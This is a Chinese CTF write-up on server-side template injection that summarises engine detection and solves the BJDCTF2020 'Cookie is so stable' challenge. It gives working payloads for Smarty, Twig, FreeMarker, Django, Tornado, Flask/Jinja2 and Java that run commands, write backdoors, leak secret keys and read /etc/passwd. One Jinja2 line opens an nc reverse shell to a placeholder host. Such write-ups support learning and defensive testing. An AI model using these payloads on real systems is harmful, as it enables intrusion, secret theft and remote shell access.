SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable
知识点:
模板注入漏洞总结:参考:很全的总结:一篇文章带你理解漏洞之 SSTI 漏洞 | K0rz3n's Blog
1.常用的模板引擎
PHP:smarty Twig Blade;
python : jinja2 django tornado
java : JSP FreeMarker Velocity
当在服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题.
具体看参考;下面讲使用;
注入检测:工具:GitHub - epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation Tool
使用:
Tplmap的安装与用法(内包含解决缺少库报错的处理教程)_小 白 萝 卜的博客-CSDN博客_tplmap
![SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable_第1张图片](http://img.e-com-net.com/image/info8/db41386843bb47f69ed781b30135d46c.jpg)
Twig
{{7*‘7’}} 输出49
Jinja
{{7*‘7’}}输出7777777
攻击:
攻击方向:
找到模板注入主要从三个方向进行攻击
(1)模板本身
(2)框架本身
(3)语言本身
1.模板本身;
(1)Smarty
payload
打开文件:
{self::getStreamVariable("file:///proc/self/loginuid")}写后门:
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())}(2)Twig
payload:其中id是命令;
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}(3)freeMarker
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }2.利用框架本身的特性进行攻击
1).Django
http://localhost:8000/?email={user.groups.model._meta.app_config.module.admin.settings.SECRET_KEY}
http://localhost:8000/?email={user.user_permissions.model._meta.app_config.module.admin.settings.SECRET_KEY}
2).Flask/Jinja2
config 是Flask模版中的一个全局对象,它代表“当前配置对象(flask.config)”,它是一个类字典的对象,它包含了所有应用程序的配置值。在大多数情况下,它包含了比如数据库链接字符串,连接到第三方的凭证,SECRET_KEY等敏感值。虽然config是一个类字典对象,但是通过查阅文档可以发现 config 有很多神奇的方法:from_envvar, from_object, from_pyfile, 以及root_path。
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil', 'w').write('from os import system%0aSHELL = system') }}
//写文件
{{ config.from_pyfile('/tmp/evil') }}
//加载system
{{ config['SHELL']('nc xxxx xx -e /bin/sh') }}
//执行命令反弹SHELL3).Tornado
http://117.78.26.79:31093/error?msg={{handler.settings}}3.利用模语言本身的特性进行攻击
1)python
Python 沙盒逃逸备忘 | K0rz3n's Blog
2).JAVA
payload:
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}当然要是文件操作就要用另外的类了,思路是不变的
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
回到题目:
在flag界面输入{{7*7}}
回显49;
存在模板注入;
题目提示cookie;
抓包看看:也可以F12 网络查看数据包发现;
![SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable_第2张图片](http://img.e-com-net.com/image/info8/67cf3cf932b54de58117ce68a158b0cd.jpg)
有一个set-cookie;
也就是模板注入的地方:
先使用sytem()试试;
![SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable_第3张图片](http://img.e-com-net.com/image/info8/ac0eebe073e7444baa79b4f043b311eb.jpg)
不行,再看看这是什么类型的注入:
使用{{7*'7'}} 还是回显49,看来是Twig;
直接上payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
(要在第二个数据包中构造cookie的user;下图是第一个,在参数username直接构造不是不行的)
![SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable_第4张图片](http://img.e-com-net.com/image/info8/f2f377b95c0243959f48a83fd9a59e7c.jpg)
可以用F12看看数据包:![SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable_第5张图片](http://img.e-com-net.com/image/info8/8e1dc94ca513485db38ccafc2da57146.jpg)
![SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable_第6张图片](http://img.e-com-net.com/image/info8/76372212f5a04cc3b8cdecbd107d60ef.jpg)
![SSTI 模板注入漏洞总结之[BJDCTF2020]Cookie is so stable_第7张图片](http://img.e-com-net.com/image/info8/ab32488f4fc94903b031dd6d874cf260.jpg)